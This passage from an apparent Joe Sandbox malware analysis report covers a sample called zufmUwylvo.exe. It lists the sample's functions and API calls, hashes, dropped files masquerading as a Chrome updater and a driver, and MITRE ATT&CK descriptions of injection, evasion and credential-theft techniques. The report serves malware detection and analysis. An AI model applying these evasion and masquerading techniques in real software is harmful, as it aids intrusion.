API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 1436141585db61b9cd323bea63ccb81ac3803dbb99db4b04e4d6733691c5e0e3
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 8F016931300A4196EB10DB92A85C3996BA1F788FC0F498035CF8D83B54DEBCDA99C720

Function 000002311E4037AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002311E4037C8
GetCurrentProcess.KERNEL32 ref: 000002311E4037D6
VirtualProtectEx.KERNEL32 ref: 000002311E4037F8
GetCurrentProcess.KERNEL32 ref: 000002311E403819
VirtualProtectEx.KERNEL32 ref: 000002311E40383A
TerminateThread.KERNEL32 ref: 000002311E403849

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 39b3fd6f244dfdbbef7de30a66302c04ed3fc3db4916ffe4371912624f1dad66
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 03111B7571174086FF249BA1E80D79A6BA0BB48F85F040429DB8D87B58EF7CD6289720

Function 000002311E401AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002311E401AD8
StrCmpNIW.SHLWAPI ref: 000002311E401AF2
lstrlenW.KERNEL32 ref: 000002311E401B01
StrCpyW.SHLWAPI ref: 000002311E401B16

Strings

\\?\, xrefs: 000002311E401AE6

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: d1ed3f87040249f2ee0493cfe87e2d83262cb0e21fa307c14222bc9f0c44543e
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: A0F03C3230464192EB209BA5E4983D96BA0F744F98F848034DB8D87E58DFACD798DB10

Function 000002311E403200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002311E403222
StrCpyW.SHLWAPI ref: 000002311E403232
StrCatW.SHLWAPI ref: 000002311E40323E
PathCombineW.SHLWAPI ref: 000002311E40324C

Strings

\\.\pipe\, xrefs: 000002311E403218

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 7ba8a71ac0ebfd5873a752557b9b3bf926ff31fbfcdac4754c18b1afdfc9f2dd
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 10F08220304B8091EE009B93B90819A6B60AB48FD0F098131DFDE87F28CEACD6A19310

Function 000002311E40A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002311E40A154
GetProcAddress.KERNEL32 ref: 000002311E40A16A
FreeLibrary.KERNEL32 ref: 000002311E40A187

Strings

mscoree.dll, xrefs: 000002311E40A14B
CorExitProcess, xrefs: 000002311E40A163

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: b733f29babe42403128b9583126669eebbecf2413509bbcc5d2796be1073a7a8
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 8CF0827131164491EF448BE0F88C3E82BA0AB48F80F042429978FC9964CFACD6A8E720

Function 000002311E408400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002311E40840B
RtlLookupFunctionEntry.NTDLL ref: 000002311E408425
RtlVirtualUnwind.NTDLL ref: 000002311E40845C

Strings

NtQuerySystemInformation, xrefs: 000002311E408402

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual
String ID: NtQuerySystemInformation
API String ID: 2154932578-2549949336
Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction ID: 4f225481fd34d99c7e9c45dcac9c3a47d3e35c25bb95a2508efe19bb8b3580b7
Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction Fuzzy Hash: 98F08C7221475482EB108B66F8443AAA761F789FA0F440124EF8E86B44DF7CC6A5DB14

Function 000002311E4014B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002311E4014D5
HeapFree.KERNEL32 ref: 000002311E4014E4
GetProcessHeap.KERNEL32 ref: 000002311E4014F0
HeapFree.KERNEL32 ref: 000002311E4014FF
GetProcessHeap.KERNEL32 ref: 000002311E40152A

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: 3a32114773b0bedab0f03a5cf9a34ef01e1b56c75e2f21491d9012ab8fb9be0a
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: C3115A32614B88D2EB549FA6A84829A77A0F389F80F044029EBCE43B24DF7CE561D710

Function 000002311E410860 Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000002311E410960
GetLastError.KERNEL32 ref: 000002311E4109EA

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 23ef1db3f1fcc8631bd5ca5af7e4a39578f44e212d14b2bdbda247969abc4857
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: CA818A32B1061089FF50ABE598583ED2BA0B754F84F444116DB8ED3E95DBBCE662E330

Function 000002311E407A40 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002311E407A6C
GetCurrentThreadId.KERNEL32 ref: 000002311E407A7A
GetCurrentProcessId.KERNEL32 ref: 000002311E407A86
QueryPerformanceCounter.KERNEL32 ref: 000002311E407A96

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction ID: adcf7bff1c9c09910dbae9f6871f5a0dff46327a5f4a9556876c93fbe7d5abd5
Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction Fuzzy Hash: 3B112E22300F418AEF10DFA0E8593D437A4F71DB5CF051A25EBAD86B94DB7CD2A59350

Function 000002311E4026F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002311E4027D4
StrCpyW.SHLWAPI ref: 000002311E4027ED

Strings

\\.\pipe\, xrefs: 000002311E4027DF

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 9c90a73200fe15cc946f7f896f57396b2070d2061094fa000b3f2a66568c8504
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 9871B13670078146EB64DBA599483EAAB90F784F84F440136DFCD83F9ADEB8C724A714

Function 000002311E4090D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

RtlUnwindEx.NTDLL ref: 000002311E4091E7

Strings

f, xrefs: 000002311E409116
csm, xrefs: 000002311E40917E

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Unwind
String ID: csm$f
API String ID: 3419175465-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: ec0e72bf891d4615f892188efc848b1022aeb7d06f96ab5eeb920637b0fe95cf
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 0851B13A31160086EB14CF95E44CBD93B95F384F88F198534DB9A87B48DBBDDA51E710

Function 000002311E4024DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002311E4025C3
StrCpyW.SHLWAPI ref: 000002311E4025DA

Strings

\\.\pipe\, xrefs: 000002311E4025CE

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 10599a368ba494ab0bfbae90569f584ce2432a653f21b26ba1cafd8b8a9e03e0
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: C851E73221478142EA749AA5915C3EAAE50F3C5F80F150435CFCE83FDADABDC6219B64

Function 000002311E410604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002311E41071B
GetLastError.KERNEL32 ref: 000002311E41073D

Strings

U, xrefs: 000002311E4106C7

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 4931302dc65883059487281cec84bcbaad6f3a11db106763f478d909e3d09caa
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 6141A272714A4081EB20DF65E4483DA67A0F388BC4F414025EF8DC7B98DB7CD651DB50

Function 000002311E4094A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002311E4094E8
RaiseException.KERNEL32 ref: 000002311E40952E

Strings

csm, xrefs: 000002311E40951B

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 6bdf67b479b73900e0765555f44ce69123bd7c72517881fab0c52e95c39832af
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: BE114C36208B8482EB608F15E5442997BA0F7C8F98F184220DFCD47B68DF7CC661CB00

Function 000002311E401D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002311E401D9B
HeapAlloc.KERNEL32 ref: 000002311E401DAA
GetProcessHeap.KERNEL32 ref: 000002311E401E1E
HeapFree.KERNEL32 ref: 000002311E401E2C

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 0ead60b27caeb94a74eca870571102c6b789b0d94e84c8f774e7a0192125fdec
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 97217136704B8081EB118F99A4082DAB7E0FB84F94F154124EFCD87F14EABCD6629750

Function 000002311E401274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002311E40127A
HeapAlloc.KERNEL32 ref: 000002311E401289
GetProcessHeap.KERNEL32 ref: 000002311E4012A3
HeapAlloc.KERNEL32 ref: 000002311E4012B4

Memory Dump Source

Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 2fe449104d3b73ac9362b2aa6bad7e671daec3c14e7a36a4455f53222d52c19c
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 9CE0EDB1711600C6EB049FA6D8183997AE1FB88F51F4AC024CE8D47750DFBDE5A9D760

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zufmUwylvo.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zufmUwylvo.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rgbvhhk.d5v.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vujfqkf.bxw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvpdge3o.2vt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogtzzszs.oek.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkmeltcf.txm.psm1

Windows Analysis Report
zufmUwylvo.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

